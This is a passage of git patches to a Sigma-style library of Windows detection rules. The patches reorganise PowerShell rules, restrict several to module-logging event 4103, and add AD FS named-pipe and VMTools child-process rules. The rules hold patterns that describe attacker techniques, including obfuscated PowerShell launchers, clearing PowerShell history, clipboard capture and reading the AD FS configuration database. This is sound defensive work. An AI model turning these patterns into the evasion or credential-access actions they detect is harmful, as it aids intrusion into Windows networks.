powershell_classic}/powershell_renamed_powershell.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_tamper_with_windows_defender.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_wsman_com_provider_no_powershell.yml (100%) rename rules/windows/powershell/{ => powershell_classic}/powershell_xor_commandline.yml (100%) rename rules/windows/powershell/{ => powershell_script}/powershell_accessing_win_api.yml (100%) diff --git a/rules/windows/powershell/powershell_classic_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_classic/powershell_classic_alternate_powershell_hosts.yml similarity index 100% rename from rules/windows/powershell/powershell_classic_alternate_powershell_hosts.yml rename to rules/windows/powershell/powershell_classic/powershell_classic_alternate_powershell_hosts.yml diff --git a/rules/windows/powershell/powershell_classic_powercat.yml b/rules/windows/powershell/powershell_classic/powershell_classic_powercat.yml similarity index 100% rename from rules/windows/powershell/powershell_classic_powercat.yml rename to rules/windows/powershell/powershell_classic/powershell_classic_powercat.yml diff --git a/rules/windows/powershell/powershell_classic_remote_powershell_session.yml b/rules/windows/powershell/powershell_classic/powershell_classic_remote_powershell_session.yml similarity index 100% rename from rules/windows/powershell/powershell_classic_remote_powershell_session.yml rename to rules/windows/powershell/powershell_classic/powershell_classic_remote_powershell_session.yml diff --git a/rules/windows/powershell/powershell_classic_susp_athremotefxvgpudisablementcommand.yml b/rules/windows/powershell/powershell_classic/powershell_classic_susp_athremotefxvgpudisablementcommand.yml similarity index 100% rename from rules/windows/powershell/powershell_classic_susp_athremotefxvgpudisablementcommand.yml rename to rules/windows/powershell/powershell_classic/powershell_classic_susp_athremotefxvgpudisablementcommand.yml diff --git a/rules/windows/powershell/powershell_classic_susp_zip_compress.yml b/rules/windows/powershell/powershell_classic/powershell_classic_susp_zip_compress.yml similarity index 100% rename from rules/windows/powershell/powershell_classic_susp_zip_compress.yml rename to rules/windows/powershell/powershell_classic/powershell_classic_susp_zip_compress.yml diff --git a/rules/windows/powershell/powershell_classic_suspicious_download.yml b/rules/windows/powershell/powershell_classic/powershell_classic_suspicious_download.yml similarity index 100% rename from rules/windows/powershell/powershell_classic_suspicious_download.yml rename to rules/windows/powershell/powershell_classic/powershell_classic_suspicious_download.yml diff --git a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml b/rules/windows/powershell/powershell_classic/powershell_delete_volume_shadow_copies.yml similarity index 100% rename from rules/windows/powershell/powershell_delete_volume_shadow_copies.yml rename to rules/windows/powershell/powershell_classic/powershell_delete_volume_shadow_copies.yml diff --git a/rules/windows/powershell/powershell_downgrade_attack.yml b/rules/windows/powershell/powershell_classic/powershell_downgrade_attack.yml similarity index 100% rename from rules/windows/powershell/powershell_downgrade_attack.yml rename to rules/windows/powershell/powershell_classic/powershell_downgrade_attack.yml diff --git a/rules/windows/powershell/powershell_exe_calling_ps.yml b/rules/windows/powershell/powershell_classic/powershell_exe_calling_ps.yml similarity index 100% rename from rules/windows/powershell/powershell_exe_calling_ps.yml rename to rules/windows/powershell/powershell_classic/powershell_exe_calling_ps.yml diff --git a/rules/windows/powershell/powershell_renamed_powershell.yml b/rules/windows/powershell/powershell_classic/powershell_renamed_powershell.yml similarity index 100% rename from rules/windows/powershell/powershell_renamed_powershell.yml rename to rules/windows/powershell/powershell_classic/powershell_renamed_powershell.yml diff --git a/rules/windows/powershell/powershell_tamper_with_windows_defender.yml b/rules/windows/powershell/powershell_classic/powershell_tamper_with_windows_defender.yml similarity index 100% rename from rules/windows/powershell/powershell_tamper_with_windows_defender.yml rename to rules/windows/powershell/powershell_classic/powershell_tamper_with_windows_defender.yml diff --git a/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml b/rules/windows/powershell/powershell_classic/powershell_wsman_com_provider_no_powershell.yml similarity index 100% rename from rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml rename to rules/windows/powershell/powershell_classic/powershell_wsman_com_provider_no_powershell.yml diff --git a/rules/windows/powershell/powershell_xor_commandline.yml b/rules/windows/powershell/powershell_classic/powershell_xor_commandline.yml similarity index 100% rename from rules/windows/powershell/powershell_xor_commandline.yml rename to rules/windows/powershell/powershell_classic/powershell_xor_commandline.yml diff --git a/rules/windows/powershell/powershell_accessing_win_api.yml b/rules/windows/powershell/powershell_script/powershell_accessing_win_api.yml similarity index 100% rename from rules/windows/powershell/powershell_accessing_win_api.yml rename to rules/windows/powershell/powershell_script/powershell_accessing_win_api.yml From 0ee777e3b427c8e48d4dfd9a516c4b7581b37995 Mon Sep 17 00:00:00 2001 From: Mika Luhta <12100880+mluhta@users.noreply.github.com> Date: Thu, 7 Oct 2021 14:25:18 +0300 Subject: [PATCH 1184/1367] Fix rule detection logic Changed ParentImage to Image --- rules/windows/process_creation/win_susp_regsvr32_no_dll.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml index 021e88fb..b97d80b7 100644 --- a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml +++ b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml @@ -15,7 +15,7 @@ logsource: product: windows detection: selection: - ParentImage|endswith: '\regsvr32.exe' + Image|endswith: '\regsvr32.exe' filter: CommandLine|contains: - '.dll' From e70d17745ef89c6d2e20c9a0a88d8fe7d26a9bea Mon Sep 17 00:00:00 2001 From: Mika Luhta <12100880+mluhta@users.noreply.github.com> Date: Thu, 7 Oct 2021 18:42:22 +0200 Subject: [PATCH 1185/1367] Update modified field --- rules/windows/process_creation/win_susp_regsvr32_no_dll.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml index b97d80b7..790363fa 100644 --- a/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml +++ b/rules/windows/process_creation/win_susp_regsvr32_no_dll.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a regsvr.exe execution that doesn't contain a DLL in the command line author: Florian Roth date: 2019/07/17 -modified: 2021/07/20 +modified: 2021/10/07 references: - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ tags: From 7f17eaeb87019370134b4ac3cdd6f8812a9c7c65 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 8 Oct 2021 01:57:22 -0400 Subject: [PATCH 1186/1367] added rule to detect suspicious named pipe connections to an AD FS server --- .../sysmon_susp_adfs_namedpipe_connection.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/pipe_created/sysmon_susp_adfs_namedpipe_connection.yml diff --git a/rules/windows/pipe_created/sysmon_susp_adfs_namedpipe_connection.yml b/rules/windows/pipe_created/sysmon_susp_adfs_namedpipe_connection.yml new file mode 100644 index 00000000..f1bc4e86 --- /dev/null +++ b/rules/windows/pipe_created/sysmon_susp_adfs_namedpipe_connection.yml @@ -0,0 +1,33 @@ +title: ADFS Database Named Pipe Connection +id: 1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3 +description: Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens. +status: experimental +date: 2021/10/08 +modified: 2021/10/08 +author: Roberto Rodriguez @Cyb3rWard0g +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml + - https://o365blog.com/post/adfs/ + - https://github.com/Azure/SimuLand +tags: + - attack.collection + - attack.t1005 +logsource: + product: windows + service: pipe_connected +detection: + selection: + PipeName: '\MICROSOFT##WID\tsql\query' + filter: + Image|endswith: + - 'Microsoft.IdentityServer.ServiceHost.exe' + - 'Microsoft.Identity.Health.Adfs.PshSurrogate.exe' + - 'AzureADConnect.exe' + - 'Microsoft.Tri.Sensor.exe' + - 'wsmprovhost.exe' + - 'mmc.exe' + - 'sqlservr.exe' + condition: selection and not filter +falsepositives: + - Processes in the filter condition +level: critical \ No newline at end of file From a45e516f993896e4557c7139aa81d87d0d038400 Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Fri, 8 Oct 2021 13:28:35 +0545 Subject: [PATCH 1187/1367] Added rule for possible persistence via VMTools --- .../sysmon_vmtoolsd_susp_child_process.yml | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml diff --git a/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml b/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml new file mode 100644 index 00000000..3a7ddb28 --- /dev/null +++ b/rules/windows/process_creation/sysmon_vmtoolsd_susp_child_process.yml @@ -0,0 +1,39 @@ +title: VMToolsd Suspicious Child Process +id: 5687f942-867b-4578-ade7-1e341c46e99a +status: experimental +description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup +tags: + - attack.execution + - attack.persistence + - attack.t1059 +author: behops, Bhabesh Raj +date: 2021/10/08 +references: + - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ +fields: + - CommandLine + - ParentCommandLine + - Details +falsepositives: + - Legitimate use by adminstrator +level: high +logsource: + category: process_creation + product: windows +detection: + selection: + ParentImage|endswith: '\vmtoolsd.exe' + Image|endswith: + - '\cmd.exe' + - '\powershell.exe' + - '\rundll32.exe' + - '\regsvr32.exe' + - '\wscript.exe' + - '\cscript.exe' + filter: + CommandLine|contains: + - 'poweron-vm-default.bat' + - 'poweroff-vm-default.bat' + - 'resume-vm-default.bat' + - 'suspend-vm-default.bat' + condition: selection and not filter From 04c37d977bc22b84cb8689fecda9bf7aabfa2118 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Fri, 8 Oct 2021 16:36:34 +0200 Subject: [PATCH 1188/1367] fix: prevent FP triggering of other sources utilising ID 1102 --- rules/windows/builtin/win_event_log_cleared.yml | 2 ++ rules/windows/builtin/win_susp_eventlog_cleared.yml | 5 +++-- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index 92c9a2ea..992e3711 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -5,6 +5,7 @@ description: Checks for event id 1102 which indicates the security event log was references: - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/SecurityEventLogCleared.yaml date: 2021/08/15 +modified: 2021/10/08 author: Saw Winn Naung level: medium logsource: @@ -16,6 +17,7 @@ tags: detection: selection: EventID: 1102 + Source: Microsoft-Windows-Eventlog condition: selection fields: - SubjectLogonId diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index 454919e5..02b08252 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml @@ -9,7 +9,7 @@ references: - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 author: Florian Roth date: 2017/01/10 -modified: 2021/09/21 +modified: 2021/10/08 tags: - attack.defense_evasion - attack.t1070 # an old one @@ -23,8 +23,9 @@ detection: EventID: - 517 - 1102 + Source: Microsoft-Windows-Eventlog condition: selection falsepositives: - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - System provisioning (system reset before the golden image creation) -level: high \ No newline at end of file +level: high From fe7fbfd5fca17b13db0683f0e1fa65b635678c82 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 9 Oct 2021 09:50:49 +0200 Subject: [PATCH 1189/1367] order powershell_module --- .../powershell_alternate_powershell_hosts.yml | 2 +- .../powershell_bad_opsec_artifacts.yml | 20 ++++++---------- .../powershell_clear_powershell_history.yml | 24 +++++-------------- .../powershell_decompress_commands.yml | 13 +++++----- .../powershell_get_clipboard.yml | 13 +++++----- .../powershell_invoke_obfuscation_clip.yml | 15 ++++++------ ...hell_invoke_obfuscation_obfuscated_iex.yml | 21 ++++++---------- .../powershell_invoke_obfuscation_stdin.yml | 14 +++++------ .../powershell_invoke_obfuscation_var.yml | 15 ++++++------ ...rshell_invoke_obfuscation_via_compress.yml | 15 ++++++------ ...wershell_invoke_obfuscation_via_rundll.yml | 15 ++++++------ ...owershell_invoke_obfuscation_via_stdin.yml | 14 +++++------ ...rshell_invoke_obfuscation_via_use_clip.yml | 14 +++++------ ...shell_invoke_obfuscation_via_use_mhsta.yml | 15 ++++++------ ...ll_invoke_obfuscation_via_use_rundll32.yml | 15 ++++++------ .../powershell_invoke_obfuscation_via_var.yml | 16 ++++++------- .../powershell_powercat.yml | 0 .../powershell_remote_powershell_session.yml | 2 +- ...susp_athremotefxvgpudisablementcommand.yml | 0 .../powershell_susp_zip_compress.yml | 18 ++++++-------- 20 files changed, 119 insertions(+), 142 deletions(-) rename rules/windows/powershell/{ => powershell_module}/powershell_alternate_powershell_hosts.yml (94%) rename rules/windows/powershell/{ => powershell_module}/powershell_bad_opsec_artifacts.yml (73%) rename rules/windows/powershell/{ => powershell_module}/powershell_clear_powershell_history.yml (58%) rename rules/windows/powershell/{ => powershell_module}/powershell_decompress_commands.yml (70%) rename rules/windows/powershell/{ => powershell_module}/powershell_get_clipboard.yml (70%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_clip.yml (62%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_obfuscated_iex.yml (59%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_stdin.yml (63%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_var.yml (61%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_compress.yml (61%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_rundll.yml (64%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_stdin.yml (64%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_use_clip.yml (64%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_use_mhsta.yml (63%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_use_rundll32.yml (63%) rename rules/windows/powershell/{ => powershell_module}/powershell_invoke_obfuscation_via_var.yml (62%) rename rules/windows/powershell/{ => powershell_module}/powershell_powercat.yml (100%) rename rules/windows/powershell/{ => powershell_module}/powershell_remote_powershell_session.yml (90%) rename rules/windows/powershell/{ => powershell_module}/powershell_susp_athremotefxvgpudisablementcommand.yml (100%) rename rules/windows/powershell/{ => powershell_module}/powershell_susp_zip_compress.yml (63%) diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml similarity index 94% rename from rules/windows/powershell/powershell_alternate_powershell_hosts.yml rename to rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml index d3ce9723..fb409b13 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/powershell_alternate_powershell_hosts.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: ModuleLogging must be enable + definition: Module Logging must be enable detection: selection: EventID: 4103 diff --git a/rules/windows/powershell/powershell_bad_opsec_artifacts.yml b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml similarity index 73% rename from rules/windows/powershell/powershell_bad_opsec_artifacts.yml rename to rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml index 64bc41c2..dcb92bd0 100644 --- a/rules/windows/powershell/powershell_bad_opsec_artifacts.yml +++ b/rules/windows/powershell/powershell_module/powershell_bad_opsec_artifacts.yml @@ -1,5 +1,8 @@ title: Bad Opsec Powershell Code Artifacts -id: 73e733cc-1ace-3212-a107-ff2523cc9fc3 +id: 8d31a8ce-46b5-4dd6-bdc3-680931f1db86 +related: + - id: 73e733cc-1ace-3212-a107-ff2523cc9fc3 + type: derived description: Focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec. status: experimental references: @@ -8,7 +11,7 @@ references: - https://www.mdeditor.tw/pl/pgRt author: 'ok @securonix invrep_de, oscd.community' date: 2020/10/09 -modified: 2020/10/09 +modified: 2021/10/07 tags: - attack.execution - attack.t1059.001 @@ -16,17 +19,8 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104 , Module Logging must be enable for 4103 + definition: Module Logging must be enable detection: - selection_4104: - EventID: 4104 - ScriptBlockText|contains: - - '$DoIt' - - 'harmj0y' - - 'mattifestation' - - '_RastaMouse' - - 'tifkin_' - - '0xdeadbeef' selection_4103: EventID: 4103 Payload|contains: @@ -36,7 +30,7 @@ detection: - '_RastaMouse' - 'tifkin_' - '0xdeadbeef' - condition: selection_4104 or selection_4103 + condition: selection_4103 falsepositives: - 'Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments.' level: critical diff --git a/rules/windows/powershell/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml similarity index 58% rename from rules/windows/powershell/powershell_clear_powershell_history.yml rename to rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml index 430e9305..fb57e960 100644 --- a/rules/windows/powershell/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_module/powershell_clear_powershell_history.yml @@ -1,5 +1,8 @@ title: Clear PowerShell History -id: dfba4ce1-e0ea-495f-986e-97140f31af2d +id: f99276ad-d122-4989-a09a-d00904a5f9d2 +related: + - id: dfba4ce1-e0ea-495f-986e-97140f31af2d + type: derived status: experimental description: Detects keywords that could indicate clearing PowerShell history date: 2019/10/25 @@ -14,22 +17,8 @@ tags: logsource: product: windows service: powershell - definition: 4104 Script block logging must be enabled , 4103 Module Logging must be enabled + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - selection_2: - ScriptBlockText|contains: - - 'del' - - 'Remove-Item' - - 'rm' - ScriptBlockText|contains|all: - - '(Get-PSReadlineOption).HistorySavePath' - selection_3: - ScriptBlockText|contains|all: - - 'Set-PSReadlineOption' - - '–HistorySaveStyle' - - 'SaveNothing' selection_4: EventID: 4103 selection_5: @@ -44,8 +33,7 @@ detection: - 'Set-PSReadlineOption' - '–HistorySaveStyle' - 'SaveNothing' - condition: selection_1 and ( selection_2 or selection_3 ) or - selection_4 and ( selection_5 or selection_6 ) + condition: selection_4 and ( selection_5 or selection_6 ) falsepositives: - Legitimate PowerShell scripts level: medium diff --git a/rules/windows/powershell/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml similarity index 70% rename from rules/windows/powershell/powershell_decompress_commands.yml rename to rules/windows/powershell/powershell_module/powershell_decompress_commands.yml index 19028f6a..e30c7fe3 100644 --- a/rules/windows/powershell/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_module/powershell_decompress_commands.yml @@ -1,8 +1,12 @@ title: PowerShell Decompress Commands -id: 81fbdce6-ee49-485a-908d-1a728c5dcb09 +id: 1ddc1472-8e52-4f7d-9f11-eab14fc171f5 +related: + - id: 81fbdce6-ee49-485a-908d-1a728c5dcb09 + type: derived description: A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files. status: experimental date: 2020/05/02 +modified: 2021/10/07 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.defense_evasion @@ -13,15 +17,12 @@ references: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection1: - EventID: 4104 - ScriptBlockText|contains: 'Expand-Archive' selection2: EventID: 4103 Payload|contains: 'Expand-Archive' - condition: selection1 or selection2 + condition: selection2 falsepositives: - unknown level: informational \ No newline at end of file diff --git a/rules/windows/powershell/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml similarity index 70% rename from rules/windows/powershell/powershell_get_clipboard.yml rename to rules/windows/powershell/powershell_module/powershell_get_clipboard.yml index 542c432c..2902ece6 100644 --- a/rules/windows/powershell/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_module/powershell_get_clipboard.yml @@ -1,8 +1,12 @@ title: PowerShell Get Clipboard -id: 5486f63a-aa4c-488d-9a61-c9192853099f +id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78 +related: + - id: 5486f63a-aa4c-488d-9a61-c9192853099f + type: derived description: A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents. status: experimental date: 2020/05/02 +modified: 2021/10/07 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.collection @@ -13,15 +17,12 @@ references: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection1: - EventID: 4104 - ScriptBlockText|contains: 'Get-Clipboard' selection2: EventID: 4103 Payload|contains: 'Get-Clipboard' - condition: selection1 or selection2 + condition: selection2 falsepositives: - unknown level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_clip.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml similarity index 62% rename from rules/windows/powershell/powershell_invoke_obfuscation_clip.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml index 45c57fa3..a203d470 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_clip.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_clip.yml @@ -1,9 +1,13 @@ title: Invoke-Obfuscation CLIP+ Launcher -id: 73e67340-0d25-11eb-adc1-0242ac120002 +id: a136cde0-61ad-4a61-9b82-8dc490e60dd2 +related : + - id: 73e67340-0d25-11eb-adc1-0242ac120002 + type: derived description: Detects Obfuscated use of Clip.exe to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/13 +modified: 2021/10/07 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) tags: @@ -14,15 +18,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104 , Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' - selection_2: + selection_4103: EventID: 4103 Payload|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml similarity index 59% rename from rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml index 94164d37..2dcd9ad2 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -1,10 +1,13 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation -id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 +id: 2f211361-7dce-442d-b78a-c04039677378 +related: + - id: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7 + type: derived description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888" status: experimental author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community date: 2019/11/08 -modified: 2020/08/24 +modified: 2021/10/07 tags: - attack.defense_evasion - attack.t1027 @@ -14,18 +17,8 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - selection_2: - - ScriptBlockText|re: '\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[' - - ScriptBlockText|re: '\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[' - - ScriptBlockText|re: '\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[' - - ScriptBlockText|re: '\$env:ComSpec\[(\s*\d{1,3}\s*,){2}' - - ScriptBlockText|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - - ScriptBlockText|re: '\$VerbosePreference\.ToString\(' - - ScriptBlockText|re: '\String\]\s*\$VerbosePreference' selection_3: EventID: 4103 selection_4: @@ -36,7 +29,7 @@ detection: - Payload|re: '\\\\*mdr\\\\*\W\s*\)\.Name' - Payload|re: '\$VerbosePreference\.ToString\(' - Payload|re: '\String\]\s*\$VerbosePreference' - condition: ( selection_1 and selection_2 ) or ( selection_3 and selection_4 ) + condition: selection_3 and selection_4 falsepositives: - Unknown level: high diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_stdin.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml similarity index 63% rename from rules/windows/powershell/powershell_invoke_obfuscation_stdin.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml index a8b5d343..d531c87e 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_stdin.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_stdin.yml @@ -1,5 +1,8 @@ title: Invoke-Obfuscation STDIN+ Launcher -id: 779c8c12-0eb1-11eb-adc1-0242ac120002 +id: 9ac8b09b-45de-4a07-9da1-0de8c09304a3 +related: + - id: 779c8c12-0eb1-11eb-adc1-0242ac120002 + type: derived description: Detects Obfuscated use of stdin to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community @@ -14,15 +17,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' - selection_2: + selection_4103: EventID: 4103 Payload|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_var.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml similarity index 61% rename from rules/windows/powershell/powershell_invoke_obfuscation_var.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml index f8476262..6f187cfb 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_var.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_var.yml @@ -1,5 +1,8 @@ title: Invoke-Obfuscation VAR+ Launcher -id: 0adfbc14-0ed1-11eb-adc1-0242ac120002 +id: 6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e +related: + - id: 0adfbc14-0ed1-11eb-adc1-0242ac120002 + type: derived description: Detects Obfuscated use of Environment Variables to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community @@ -14,15 +17,11 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104,Module Logging must be enabled for 4103 -detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' - selection_2: + definition: Module Logging must be enable + selection_4103: EventID: 4103 Payload|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' - condition: 1 of them + condition: selection_4103 falsepositives: - Unknown level: high \ No newline at end of file diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml similarity index 61% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml rename to rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml index 165d13d2..e4f1400c 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml +++ b/rules/windows/powershell/powershell_module/powershell_invoke_obfuscation_via_compress.yml @@ -1,9 +1,13 @@ title: Invoke-Obfuscation COMPRESS OBFUSCATION -id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07 +id: 7034cbbb-cc55-4dc2-8dad-36c0b942e8f1 +related: + - id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07 + type: derived description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION status: experimental author: Timur Zinniatullin, oscd.community date: 2020/10/18 +modified: 2021/10/07 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 19) tags: @@ -14,15 +18,12 @@ tags: logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 + definition: Module Logging must be enable detection: - selection_1: - EventID: 4104 - ScriptBlockText|re: '(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend' - selection_2: + selection_4103: EventID: 4103 Payload|re: 